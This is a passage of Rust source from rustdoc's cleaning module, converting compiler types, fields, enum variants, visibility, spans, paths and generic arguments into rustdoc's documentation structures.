            PrimitiveType::Unit => "unit",
            PrimitiveType::RawPointer => "pointer",
            PrimitiveType::Reference => "reference",
            PrimitiveType::Fn => "fn",
            PrimitiveType::Never => "never",
        }
    }
    /// The URL fragment used when linking; currently the same as `as_str`.
    pub fn to_url_str(&self) -> &'static str {
        self.as_str()
    }
}
impl From<ast::IntTy> for PrimitiveType {
    /// Maps an AST signed-integer type to its rustdoc primitive, one-to-one.
    fn from(ty: ast::IntTy) -> PrimitiveType {
        match ty {
            ast::IntTy::I128 => PrimitiveType::I128,
            ast::IntTy::I64 => PrimitiveType::I64,
            ast::IntTy::I32 => PrimitiveType::I32,
            ast::IntTy::I16 => PrimitiveType::I16,
            ast::IntTy::I8 => PrimitiveType::I8,
            ast::IntTy::Isize => PrimitiveType::Isize,
        }
    }
}
impl From<ast::UintTy> for PrimitiveType {
    /// Maps an AST unsigned-integer type to its rustdoc primitive, one-to-one.
    fn from(ty: ast::UintTy) -> PrimitiveType {
        match ty {
            ast::UintTy::U128 => PrimitiveType::U128,
            ast::UintTy::U64 => PrimitiveType::U64,
            ast::UintTy::U32 => PrimitiveType::U32,
            ast::UintTy::U16 => PrimitiveType::U16,
            ast::UintTy::U8 => PrimitiveType::U8,
            ast::UintTy::Usize => PrimitiveType::Usize,
        }
    }
}
impl From<ast::FloatTy> for PrimitiveType {
    /// Maps an AST float type to its rustdoc primitive, one-to-one.
    fn from(ty: ast::FloatTy) -> PrimitiveType {
        match ty {
            ast::FloatTy::F64 => PrimitiveType::F64,
            ast::FloatTy::F32 => PrimitiveType::F32,
        }
    }
}
impl Clean<Type> for hir::Ty {
    /// Cleans a syntactic (HIR) type into rustdoc's `Type`.
    fn clean(&self, cx: &DocContext) -> Type {
        use rustc::hir::*;
        match self.node {
            TyNever => Never,
            TyPtr(ref m) => RawPointer(m.mutbl.clean(cx), box m.ty.clean(cx)),
            TyRptr(ref l, ref m) => {
                // Elided lifetimes are dropped instead of rendered.
                let lifetime = if l.is_elided() {
                    None
                } else {
                    Some(l.clean(cx))
                };
                BorrowedRef {lifetime: lifetime, mutability: m.mutbl.clean(cx),
                             type_: box m.ty.clean(cx)}
            }
            TySlice(ref ty) => Slice(box ty.clean(cx)),
            TyArray(ref ty, ref length) => {
                // Try to evaluate the array length so it renders as a concrete
                // number; otherwise print the unevaluated constant.
                let def_id = cx.tcx.hir.local_def_id(length.id);
                let param_env = cx.tcx.param_env(def_id);
                let substs = Substs::identity_for_item(cx.tcx, def_id);
                let cid = GlobalId {
                    instance: ty::Instance::new(def_id, substs),
                    promoted: None
                };
                let length = cx.tcx.const_eval(param_env.and(cid)).unwrap_or_else(|_| {
                    ty::Const::unevaluated(cx.tcx, def_id, substs, cx.tcx.types.usize)
                });
                let length = print_const(cx, length);
                Array(box ty.clean(cx), length)
            },
            TyTup(ref tys) => Tuple(tys.clean(cx)),
            TyPath(hir::QPath::Resolved(None, ref path)) => {
                // Honor any in-flight substitution (e.g. from an enclosing
                // type-alias expansion, see `enter_alias` below).
                if let Some(new_ty) = cx.ty_substs.borrow().get(&path.def).cloned() {
                    return new_ty;
                }
                // A type parameter standing in for an `impl Trait` argument is
                // rendered as the impl-trait bounds themselves.
                if let Def::TyParam(did) = path.def {
                    if let Some(bounds) = cx.impl_trait_bounds.borrow_mut().remove(&did) {
                        return ImplTrait(bounds);
                    }
                }
                let mut alias = None;
                if let Def::TyAlias(def_id) = path.def {
                    // Substitute private type aliases
                    if let Some(node_id) = cx.tcx.hir.as_local_node_id(def_id) {
                        if !cx.access_levels.borrow().is_exported(def_id) {
                            alias = Some(&cx.tcx.hir.expect_item(node_id).node);
                        }
                    }
                };
                if let Some(&hir::ItemTy(ref ty, ref generics)) = alias {
                    // Map the alias's declared parameters to the arguments
                    // supplied at this use site, then clean the aliased type
                    // under those substitutions.
                    let provided_params = &path.segments.last().unwrap();
                    let mut ty_substs = FxHashMap();
                    let mut lt_substs = FxHashMap();
                    provided_params.with_generic_args(|generic_args| {
                        let mut indices = ty::GenericParamCount {
                            lifetimes: 0,
                            types: 0
                        };
                        for param in generics.params.iter() {
                            match param.kind {
                                hir::GenericParamKind::Lifetime { .. } => {
                                    // Locate the N-th supplied lifetime argument.
                                    let mut j = 0;
                                    let lifetime = generic_args.args.iter().find_map(|arg| {
                                        match arg {
                                            GenericArg::Lifetime(lt) => {
                                                if indices.lifetimes == j {
                                                    return Some(lt);
                                                }
                                                j += 1;
                                                None
                                            }
                                            _ => None,
                                        }
                                    });
                                    if let Some(lt) = lifetime.cloned() {
                                        if !lt.is_elided() {
                                            let lt_def_id =
                                                cx.tcx.hir.local_def_id(param.id);
                                            lt_substs.insert(lt_def_id, lt.clean(cx));
                                        }
                                    }
                                    indices.lifetimes += 1;
                                }
                                hir::GenericParamKind::Type { ref default, .. } => {
                                    let ty_param_def =
                                        Def::TyParam(cx.tcx.hir.local_def_id(param.id));
                                    // Locate the N-th supplied type argument,
                                    // or fall back to the declared default.
                                    let mut j = 0;
                                    let type_ = generic_args.args.iter().find_map(|arg| {
                                        match arg {
                                            GenericArg::Type(ty) => {
                                                if indices.types == j {
                                                    return Some(ty);
                                                }
                                                j += 1;
                                                None
                                            }
                                            _ => None,
                                        }
                                    });
                                    if let Some(ty) = type_.cloned() {
                                        ty_substs.insert(ty_param_def, ty.clean(cx));
                                    } else if let Some(default) = default.clone() {
                                        ty_substs.insert(ty_param_def,
                                                         default.into_inner().clean(cx));
                                    }
                                    indices.types += 1;
                                }
                            }
                        }
                    });
                    return cx.enter_alias(ty_substs, lt_substs, || ty.clean(cx));
                }
                resolve_type(cx, path.clean(cx), self.id)
            }
            TyPath(hir::QPath::Resolved(Some(ref qself), ref p)) => {
                // Fully qualified `<T as Trait>::Name`: the trait path is the
                // full path minus its final segment.
                let mut segments: Vec<_> = p.segments.clone().into();
                segments.pop();
                let trait_path = hir::Path {
                    span: p.span,
                    def: Def::Trait(cx.tcx.associated_item(p.def.def_id()).container.id()),
                    segments: segments.into(),
                };
                Type::QPath {
                    name: p.segments.last().unwrap().ident.name.clean(cx),
                    self_type: box qself.clean(cx),
                    trait_: box resolve_type(cx, trait_path.clean(cx), self.id)
                }
            }
            TyPath(hir::QPath::TypeRelative(ref qself, ref segment)) => {
                // `T::Name`: recover the trait from the type-checked
                // projection, when there is one; otherwise `Def::Err`.
                let mut def = Def::Err;
                let ty = hir_ty_to_ty(cx.tcx, self);
                if let ty::TyProjection(proj) = ty.sty {
                    def = Def::Trait(proj.trait_ref(cx.tcx).def_id);
                }
                let trait_path = hir::Path {
                    span: self.span,
                    def,
                    segments: vec![].into(),
                };
                Type::QPath {
                    name: segment.ident.name.clean(cx),
                    self_type: box qself.clean(cx),
                    trait_: box resolve_type(cx, trait_path.clean(cx), self.id)
                }
            }
            TyTraitObject(ref bounds, ref lifetime) => {
                // The first bound is the principal trait; the remaining
                // bounds (plus a non-elided lifetime) become extra typarams.
                match bounds[0].clean(cx).trait_ {
                    ResolvedPath { path, typarams: None, did, is_generic } => {
                        let mut bounds: Vec<self::GenericBound> = bounds[1..].iter().map(|bound| {
                            self::GenericBound::TraitBound(bound.clean(cx),
                                                           hir::TraitBoundModifier::None)
                        }).collect();
                        if !lifetime.is_elided() {
                            bounds.push(self::GenericBound::Outlives(lifetime.clean(cx)));
                        }
                        ResolvedPath { path, typarams: Some(bounds), did, is_generic, }
                    }
                    _ => Infer // shouldn't happen
                }
            }
            TyBareFn(ref barefn) => BareFunction(box barefn.clean(cx)),
            TyInfer | TyErr => Infer,
            TyTypeof(..) => panic!("Unimplemented type {:?}", self.node),
        }
    }
}
impl<'tcx> Clean<Type> for Ty<'tcx> {
fn clean(&self, cx: &DocContext) -> Type {
match self.sty {
ty::TyNever => Never,
ty::TyBool => Primitive(PrimitiveType::Bool),
ty::TyChar => Primitive(PrimitiveType::Char),
ty::TyInt(int_ty) => Primitive(int_ty.into()),
ty::TyUint(uint_ty) => Primitive(uint_ty.into()),
ty::TyFloat(float_ty) => Primitive(float_ty.into()),
ty::TyStr => Primitive(PrimitiveType::Str),
ty::TySlice(ty) => Slice(box ty.clean(cx)),
ty::TyArray(ty, n) => {
let mut n = cx.tcx.lift(&n).unwrap();
if let ConstValue::Unevaluated(def_id, substs) = n.val {
let param_env = cx.tcx.param_env(def_id);
let cid = GlobalId {
instance: ty::Instance::new(def_id, substs),
promoted: None
};
if let Ok(new_n) = cx.tcx.const_eval(param_env.and(cid)) {
n = new_n;
}
};
let n = print_const(cx, n);
Array(box ty.clean(cx), n)
}
ty::TyRawPtr(mt) => RawPointer(mt.mutbl.clean(cx), box mt.ty.clean(cx)),
ty::TyRef(r, ty, mutbl) => BorrowedRef {
lifetime: r.clean(cx),
mutability: mutbl.clean(cx),
type_: box ty.clean(cx),
},
ty::TyFnDef(..) |
ty::TyFnPtr(_) => {
let ty = cx.tcx.lift(self).unwrap();
let sig = ty.fn_sig(cx.tcx);
BareFunction(box BareFunctionDecl {
unsafety: sig.unsafety(),
generic_params: Vec::new(),
decl: (cx.tcx.hir.local_def_id(ast::CRATE_NODE_ID), sig).clean(cx),
abi: sig.abi(),
})
}
ty::TyAdt(def, substs) => {
let did = def.did;
let kind = match def.adt_kind() {
AdtKind::Struct => TypeKind::Struct,
AdtKind::Union => TypeKind::Union,
AdtKind::Enum => TypeKind::Enum,
};
inline::record_extern_fqn(cx, did, kind);
let path = external_path(cx, &cx.tcx.item_name(did).as_str(),
None, false, vec![], substs);
ResolvedPath {
path,
typarams: None,
did,
is_generic: false,
}
}
ty::TyForeign(did) => {
inline::record_extern_fqn(cx, did, TypeKind::Foreign);
let path = external_path(cx, &cx.tcx.item_name(did).as_str(),
None, false, vec![], Substs::empty());
ResolvedPath {
path: path,
typarams: None,
did: did,
is_generic: false,
}
}
ty::TyDynamic(ref obj, ref reg) => {
if let Some(principal) = obj.principal() {
let did = principal.def_id();
inline::record_extern_fqn(cx, did, TypeKind::Trait);
let mut typarams = vec![];
reg.clean(cx).map(|b| typarams.push(GenericBound::Outlives(b)));
for did in obj.auto_traits() {
let empty = cx.tcx.intern_substs(&[]);
let path = external_path(cx, &cx.tcx.item_name(did).as_str(),
Some(did), false, vec![], empty);
inline::record_extern_fqn(cx, did, TypeKind::Trait);
let bound = GenericBound::TraitBound(PolyTrait {
trait_: ResolvedPath {
path,
typarams: None,
did,
is_generic: false,
},
generic_params: Vec::new(),
}, hir::TraitBoundModifier::None);
typarams.push(bound);
}
let mut bindings = vec![];
for pb in obj.projection_bounds() {
bindings.push(TypeBinding {
name: cx.tcx.associated_item(pb.item_def_id()).ident.name.clean(cx),
ty: pb.skip_binder().ty.clean(cx)
});
}
let path = external_path(cx, &cx.tcx.item_name(did).as_str(), Some(did),
false, bindings, principal.skip_binder().substs);
ResolvedPath {
path,
typarams: Some(typarams),
did,
is_generic: false,
}
} else {
Never
}
}
ty::TyTuple(ref t) => Tuple(t.clean(cx)),
ty::TyProjection(ref data) => data.clean(cx),
ty::TyParam(ref p) => Generic(p.name.to_string()),
ty::TyAnon(def_id, substs) => {
// Grab the "TraitA + TraitB" from `impl TraitA + TraitB`,
// by looking up the projections associated with the def_id.
let predicates_of = cx.tcx.predicates_of(def_id);
let substs = cx.tcx.lift(&substs).unwrap();
let bounds = predicates_of.instantiate(cx.tcx, substs);
let mut regions = vec![];
let mut has_sized = false;
let mut bounds = bounds.predicates.iter().filter_map(|predicate| {
let trait_ref = if let Some(tr) = predicate.to_opt_poly_trait_ref() {
tr
} else if let ty::Predicate::TypeOutlives(pred) = *predicate {
// these should turn up at the end
pred.skip_binder().1.clean(cx).map(|r| {
regions.push(GenericBound::Outlives(r))
});
return None;
} else {
return None;
};
if let Some(sized) = cx.tcx.lang_items().sized_trait() {
if trait_ref.def_id() == sized {
has_sized = true;
return None;
}
}
let bounds = bounds.predicates.iter().filter_map(|pred|
if let ty::Predicate::Projection(proj) = *pred {
let proj = proj.skip_binder();
if proj.projection_ty.trait_ref(cx.tcx) == *trait_ref.skip_binder() {
Some(TypeBinding {
name: cx.tcx.associated_item(proj.projection_ty.item_def_id)
.ident.name.clean(cx),
ty: proj.ty.clean(cx),
})
} else {
None
}
} else {
None
}
).collect();
Some((trait_ref.skip_binder(), bounds).clean(cx))
}).collect::<Vec<_>>();
bounds.extend(regions);
if !has_sized && !bounds.is_empty() {
bounds.insert(0, GenericBound::maybe_sized(cx));
}
ImplTrait(bounds)
}
ty::TyClosure(..) | ty::TyGenerator(..) => Tuple(vec![]), // FIXME(pcwalton)
ty::TyGeneratorWitness(..) => panic!("TyGeneratorWitness"),
ty::TyInfer(..) => panic!("TyInfer"),
ty::TyError => panic!("TyError"),
}
}
}
impl Clean<Item> for hir::StructField {
    /// Cleans a local struct/variant field into an `Item`.
    fn clean(&self, cx: &DocContext) -> Item {
        // The same local `DefId` feeds the def-id, stability, and
        // deprecation lookups.
        let field_did = cx.tcx.hir.local_def_id(self.id);
        Item {
            name: Some(self.ident.name).clean(cx),
            attrs: self.attrs.clean(cx),
            source: self.span.clean(cx),
            visibility: self.vis.clean(cx),
            stability: get_stability(cx, field_did),
            deprecation: get_deprecation(cx, field_did),
            def_id: field_did,
            inner: StructFieldItem(self.ty.clean(cx)),
        }
    }
}
impl<'tcx> Clean<Item> for ty::FieldDef {
    /// Cleans a type-level field definition (cross-crate fields).
    fn clean(&self, cx: &DocContext) -> Item {
        let did = self.did;
        Item {
            name: Some(self.ident.name).clean(cx),
            attrs: cx.tcx.get_attrs(did).clean(cx),
            source: cx.tcx.def_span(did).clean(cx),
            visibility: self.vis.clean(cx),
            stability: get_stability(cx, did),
            deprecation: get_deprecation(cx, did),
            def_id: did,
            inner: StructFieldItem(cx.tcx.type_of(did).clean(cx)),
        }
    }
}
/// A cleaned visibility: `pub`, inherited (private), `crate`, or
/// `pub(in path)` with the restriction path.
#[derive(Clone, PartialEq, Eq, RustcDecodable, RustcEncodable, Debug)]
pub enum Visibility {
    Public,
    Inherited,
    Crate,
    Restricted(DefId, Path),
}
impl Clean<Option<Visibility>> for hir::Visibility {
    /// Cleans a syntactic visibility; always yields `Some`.
    fn clean(&self, cx: &DocContext) -> Option<Visibility> {
        let vis = match self.node {
            hir::VisibilityKind::Public => Visibility::Public,
            hir::VisibilityKind::Crate(_) => Visibility::Crate,
            hir::VisibilityKind::Inherited => Visibility::Inherited,
            hir::VisibilityKind::Restricted { ref path, .. } => {
                // Clean the `pub(in path)` restriction path and record its def.
                let path = path.clean(cx);
                let did = register_def(cx, path.def);
                Visibility::Restricted(did, path)
            }
        };
        Some(vis)
    }
}
impl Clean<Option<Visibility>> for ty::Visibility {
    /// Anything other than fully-public is collapsed into `Inherited`.
    fn clean(&self, _: &DocContext) -> Option<Visibility> {
        match *self {
            ty::Visibility::Public => Some(Public),
            _ => Some(Inherited),
        }
    }
}
/// A cleaned struct definition.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Struct {
    pub struct_type: doctree::StructType,
    pub generics: Generics,
    pub fields: Vec<Item>,
    // Set by later passes when private fields are stripped from `fields`.
    pub fields_stripped: bool,
}
/// A cleaned union definition; structurally identical to `Struct`.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Union {
    pub struct_type: doctree::StructType,
    pub generics: Generics,
    pub fields: Vec<Item>,
    // Set by later passes when private fields are stripped from `fields`.
    pub fields_stripped: bool,
}
impl Clean<Vec<Item>> for doctree::Struct {
    /// Cleans a struct, prepending any synthesized auto-trait impls.
    fn clean(&self, cx: &DocContext) -> Vec<Item> {
        let name = self.name.clean(cx);
        let mut items = get_auto_traits_with_node_id(cx, self.id, name.clone());
        let inner = StructItem(Struct {
            struct_type: self.struct_type,
            generics: self.generics.clean(cx),
            fields: self.fields.clean(cx),
            fields_stripped: false,
        });
        items.push(Item {
            name: Some(name),
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            visibility: self.vis.clean(cx),
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            inner,
        });
        items
    }
}
impl Clean<Vec<Item>> for doctree::Union {
    /// Cleans a union, prepending any synthesized auto-trait impls.
    fn clean(&self, cx: &DocContext) -> Vec<Item> {
        let name = self.name.clean(cx);
        let mut items = get_auto_traits_with_node_id(cx, self.id, name.clone());
        let inner = UnionItem(Union {
            struct_type: self.struct_type,
            generics: self.generics.clean(cx),
            fields: self.fields.clean(cx),
            fields_stripped: false,
        });
        items.push(Item {
            name: Some(name),
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            visibility: self.vis.clean(cx),
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            inner,
        });
        items
    }
}
/// This is a more limited form of the standard Struct, different in that
/// it lacks the things most items have (name, id, parameterization). Found
/// only as a variant in an enum.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct VariantStruct {
    pub struct_type: doctree::StructType,
    pub fields: Vec<Item>,
    // Set by later passes when private fields are stripped from `fields`.
    pub fields_stripped: bool,
}
impl Clean<VariantStruct> for ::rustc::hir::VariantData {
    /// Cleans a struct-like variant body into a `VariantStruct`.
    fn clean(&self, cx: &DocContext) -> VariantStruct {
        let cleaned_fields = self.fields().iter().map(|f| f.clean(cx)).collect();
        VariantStruct {
            struct_type: doctree::struct_type_from_def(self),
            fields: cleaned_fields,
            fields_stripped: false,
        }
    }
}
/// A cleaned enum definition.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Enum {
    pub variants: Vec<Item>,
    pub generics: Generics,
    // Set by later passes when hidden variants are stripped from `variants`.
    pub variants_stripped: bool,
}
impl Clean<Vec<Item>> for doctree::Enum {
    /// Cleans an enum, prepending any synthesized auto-trait impls.
    fn clean(&self, cx: &DocContext) -> Vec<Item> {
        let name = self.name.clean(cx);
        let mut items = get_auto_traits_with_node_id(cx, self.id, name.clone());
        let inner = EnumItem(Enum {
            variants: self.variants.clean(cx),
            generics: self.generics.clean(cx),
            variants_stripped: false,
        });
        items.push(Item {
            name: Some(name),
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            visibility: self.vis.clean(cx),
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            inner,
        });
        items
    }
}
/// A single enum variant; its shape lives in `kind`.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Variant {
    pub kind: VariantKind,
}
impl Clean<Item> for doctree::Variant {
    /// Cleans a local enum variant into an `Item`.
    fn clean(&self, cx: &DocContext) -> Item {
        let kind = self.def.clean(cx);
        Item {
            name: Some(self.name.clean(cx)),
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            // Variants carry no visibility of their own.
            visibility: None,
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.def.id()),
            inner: VariantItem(Variant { kind }),
        }
    }
}
impl<'tcx> Clean<Item> for ty::VariantDef {
    /// Cleans a type-level enum variant (cross-crate), reconstructing its
    /// shape from the constructor kind: unit-like, tuple, or struct.
    fn clean(&self, cx: &DocContext) -> Item {
        let kind = match self.ctor_kind {
            CtorKind::Const => VariantKind::CLike,
            CtorKind::Fn => {
                VariantKind::Tuple(
                    self.fields.iter().map(|f| cx.tcx.type_of(f.did).clean(cx)).collect()
                )
            }
            CtorKind::Fictive => {
                VariantKind::Struct(VariantStruct {
                    struct_type: doctree::Plain,
                    fields_stripped: false,
                    fields: self.fields.iter().map(|field| {
                        Item {
                            source: cx.tcx.def_span(field.did).clean(cx),
                            name: Some(field.ident.name.clean(cx)),
                            attrs: cx.tcx.get_attrs(field.did).clean(cx),
                            visibility: field.vis.clean(cx),
                            def_id: field.did,
                            stability: get_stability(cx, field.did),
                            deprecation: get_deprecation(cx, field.did),
                            inner: StructFieldItem(cx.tcx.type_of(field.did).clean(cx))
                        }
                    }).collect()
                })
            }
        };
        Item {
            name: Some(self.name.clean(cx)),
            attrs: inline::load_attrs(cx, self.did),
            source: cx.tcx.def_span(self.did).clean(cx),
            visibility: Some(Inherited),
            def_id: self.did,
            // Field-init shorthand (was the redundant `kind: kind`).
            inner: VariantItem(Variant { kind }),
            stability: get_stability(cx, self.did),
            deprecation: get_deprecation(cx, self.did),
        }
    }
}
/// The shape of an enum variant: unit-like, tuple, or struct-like.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub enum VariantKind {
    CLike,
    Tuple(Vec<Type>),
    Struct(VariantStruct),
}
impl Clean<VariantKind> for hir::VariantData {
    /// Classifies a variant body as struct-like, unit-like, or tuple-like.
    fn clean(&self, cx: &DocContext) -> VariantKind {
        if self.is_struct() {
            return VariantKind::Struct(self.clean(cx));
        }
        if self.is_unit() {
            return VariantKind::CLike;
        }
        VariantKind::Tuple(self.fields().iter().map(|f| f.ty.clean(cx)).collect())
    }
}
/// A source location: file plus 1-based start/end line and column positions.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Span {
    pub filename: FileName,
    pub loline: usize,
    pub locol: usize,
    pub hiline: usize,
    pub hicol: usize,
}
impl Span {
    /// A placeholder span with no file and all-zero coordinates, used for
    /// items with no real source location.
    pub fn empty() -> Span {
        Span {
            filename: FileName::Anon,
            loline: 0,
            locol: 0,
            hiline: 0,
            hicol: 0,
        }
    }
}
impl Clean<Span> for syntax_pos::Span {
    /// Resolves a compiler span to file/line/column coordinates; dummy spans
    /// (e.g. for synthesized items) become `Span::empty()`.
    fn clean(&self, cx: &DocContext) -> Span {
        if self.is_dummy() {
            return Span::empty();
        }
        let codemap = cx.sess().codemap();
        let start = codemap.lookup_char_pos(self.lo());
        let end = codemap.lookup_char_pos(self.hi());
        Span {
            filename: codemap.span_to_filename(*self),
            loline: start.line,
            locol: start.col.to_usize(),
            hiline: end.line,
            hicol: end.col.to_usize(),
        }
    }
}
/// A cleaned path: its resolution (`def`), whether it is rooted at the crate
/// root (`global`), and its segments.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct Path {
    pub global: bool,
    pub def: Def,
    pub segments: Vec<PathSegment>,
}
impl Path {
    /// Build a single-segment, unresolved path with no generic arguments.
    pub fn singleton(name: String) -> Path {
        let only_segment = PathSegment {
            name,
            args: GenericArgs::AngleBracketed {
                lifetimes: Vec::new(),
                types: Vec::new(),
                bindings: Vec::new(),
            },
        };
        Path {
            global: false,
            def: Def::Err,
            segments: vec![only_segment],
        }
    }

    /// The name of the final segment. Panics if the path has no segments.
    pub fn last_name(&self) -> &str {
        self.segments.last().unwrap().name.as_str()
    }
}
impl Clean<Path> for hir::Path {
    fn clean(&self, cx: &DocContext) -> Path {
        // A global path starts with an implicit crate-root segment; skip it so
        // only the user-visible segments are kept.
        let relevant = if self.is_global() {
            &self.segments[1..]
        } else {
            &self.segments[..]
        };
        Path {
            global: self.is_global(),
            def: self.def,
            segments: relevant.clean(cx),
        }
    }
}
/// Generic arguments attached to a path segment: either the `<...>` angle
/// bracket form, or the `Fn(...) -> ...` parenthesized sugar.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum GenericArgs {
    AngleBracketed {
        lifetimes: Vec<Lifetime>,
        types: Vec<Type>,
        bindings: Vec<TypeBinding>,
    },
    Parenthesized {
        inputs: Vec<Type>,
        /// `None` when the sugared output is the unit type.
        output: Option<Type>,
    }
}
impl Clean<GenericArgs> for hir::GenericArgs {
    fn clean(&self, cx: &DocContext) -> GenericArgs {
        if self.parenthesized {
            // `Fn(A, B) -> C` sugar: the output lives in the first binding.
            let output = self.bindings[0].ty.clean(cx);
            GenericArgs::Parenthesized {
                inputs: self.inputs().clean(cx),
                // A unit output is rendered as no `-> ...` at all.
                output: if output != Type::Tuple(Vec::new()) { Some(output) } else { None }
            }
        } else {
            let (mut lifetimes, mut types) = (vec![], vec![]);
            let mut elided_lifetimes = true;
            for arg in &self.args {
                match arg {
                    GenericArg::Lifetime(lt) => {
                        if !lt.is_elided() {
                            elided_lifetimes = false;
                        }
                        lifetimes.push(lt.clean(cx));
                    }
                    GenericArg::Type(ty) => {
                        types.push(ty.clean(cx));
                    }
                }
            }
            GenericArgs::AngleBracketed {
                // If every lifetime was elided, show none of them.
                lifetimes: if elided_lifetimes { vec![] } else { lifetimes },
                types,
                bindings: self.bindings.clean(cx),
            }
        }
    }
}
/// One component of a path, with its generic arguments.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct PathSegment {
    pub name: String,
    pub args: GenericArgs,
}

impl Clean<PathSegment> for hir::PathSegment {
    fn clean(&self, cx: &DocContext) -> PathSegment {
        PathSegment {
            name: self.ident.name.clean(cx),
            // `with_generic_args` materializes defaulted/absent args for us.
            args: self.with_generic_args(|generic_args| generic_args.clean(cx))
        }
    }
}
// Recursively erase generic arguments from every path embedded in `ty`,
// leaving only segment names. Used when only the "shape" of a type matters.
fn strip_type(ty: Type) -> Type {
    match ty {
        Type::ResolvedPath { path, typarams, did, is_generic } => {
            Type::ResolvedPath { path: strip_path(&path), typarams, did, is_generic }
        }
        Type::Tuple(inner_tys) => {
            Type::Tuple(inner_tys.iter().map(|t| strip_type(t.clone())).collect())
        }
        Type::Slice(inner_ty) => Type::Slice(Box::new(strip_type(*inner_ty))),
        Type::Array(inner_ty, s) => Type::Array(Box::new(strip_type(*inner_ty)), s),
        Type::Unique(inner_ty) => Type::Unique(Box::new(strip_type(*inner_ty))),
        Type::RawPointer(m, inner_ty) => Type::RawPointer(m, Box::new(strip_type(*inner_ty))),
        Type::BorrowedRef { lifetime, mutability, type_ } => {
            Type::BorrowedRef { lifetime, mutability, type_: Box::new(strip_type(*type_)) }
        }
        Type::QPath { name, self_type, trait_ } => {
            Type::QPath {
                name,
                self_type: Box::new(strip_type(*self_type)), trait_: Box::new(strip_type(*trait_))
            }
        }
        // Primitives, generics, etc. contain no paths to strip.
        _ => ty
    }
}
fn strip_path(path: &Path) -> Path {
let segments = path.segments.iter().map(|s| {
PathSegment {
name: s.name.clone(),
args: GenericArgs::AngleBracketed {
lifetimes: Vec::new(),
types: Vec::new(),
bindings: Vec::new(),
}
}
}).collect();
Path {
global: path.global,
def: path.def.clone(),
segments,
}
}
// Render a (possibly qualified) HIR path as `a::b::c`. Type-relative paths
// (`<T>::method`) render as just the final segment.
fn qpath_to_string(p: &hir::QPath) -> String {
    let segments = match *p {
        hir::QPath::Resolved(_, ref path) => &path.segments,
        hir::QPath::TypeRelative(_, ref segment) => return segment.ident.to_string(),
    };

    let mut rendered = String::new();
    for (idx, seg) in segments.iter().enumerate() {
        if idx > 0 {
            rendered.push_str("::");
        }
        // The crate root segment is implicit and prints as nothing.
        if seg.ident.name != keywords::CrateRoot.name() {
            rendered.push_str(&*seg.ident.as_str());
        }
    }
    rendered
}
// Names and interned strings clean trivially into owned strings.
impl Clean<String> for ast::Name {
    fn clean(&self, _: &DocContext) -> String {
        self.to_string()
    }
}

impl Clean<String> for InternedString {
    fn clean(&self, _: &DocContext) -> String {
        self.to_string()
    }
}
/// A `type Alias<...> = Target;` definition: the aliased type plus its generics.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Typedef {
    pub type_: Type,
    pub generics: Generics,
}
impl Clean<Item> for doctree::Typedef {
    // Convert an AST-level typedef into a rustdoc item.
    fn clean(&self, cx: &DocContext) -> Item {
        Item {
            name: Some(self.name.clean(cx)),
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            // `NodeId` is `Copy`; the previous `.clone()` here was redundant.
            def_id: cx.tcx.hir.local_def_id(self.id),
            visibility: self.vis.clean(cx),
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            // The boolean flag presumably marks associated-type typedefs when
            // `true`; a top-level typedef is `false` — confirm against
            // `TypedefItem`'s declaration.
            inner: TypedefItem(Typedef {
                type_: self.ty.clean(cx),
                generics: self.gen.clean(cx),
            }, false),
        }
    }
}
/// A bare function pointer type, e.g. `unsafe extern "C" fn(i32) -> i32`.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct BareFunctionDecl {
    pub unsafety: hir::Unsafety,
    pub generic_params: Vec<GenericParamDef>,
    pub decl: FnDecl,
    pub abi: Abi,
}

impl Clean<BareFunctionDecl> for hir::BareFnTy {
    fn clean(&self, cx: &DocContext) -> BareFunctionDecl {
        // Clean the generics and the declaration inside an impl-Trait scope so
        // `impl Trait` in the signature is handled consistently.
        let (generic_params, decl) = enter_impl_trait(cx, || {
            (self.generic_params.clean(cx), (&*self.decl, &self.arg_names[..]).clean(cx))
        });
        BareFunctionDecl {
            unsafety: self.unsafety,
            abi: self.abi,
            decl,
            generic_params,
        }
    }
}
/// A `static` item: its type, mutability, and pretty-printed initializer.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Static {
    pub type_: Type,
    pub mutability: Mutability,
    /// It's useful to have the value of a static documented, but I have no
    /// desire to represent expressions (that'd basically be all of the AST,
    /// which is huge!). So, have a string.
    pub expr: String,
}

impl Clean<Item> for doctree::Static {
    fn clean(&self, cx: &DocContext) -> Item {
        debug!("cleaning static {}: {:?}", self.name.clean(cx), self);
        Item {
            name: Some(self.name.clean(cx)),
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            visibility: self.vis.clean(cx),
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            inner: StaticItem(Static {
                type_: self.type_.clean(cx),
                mutability: self.mutability.clean(cx),
                // Pretty-print the initializer body rather than modeling it.
                expr: print_const_expr(cx, self.expr),
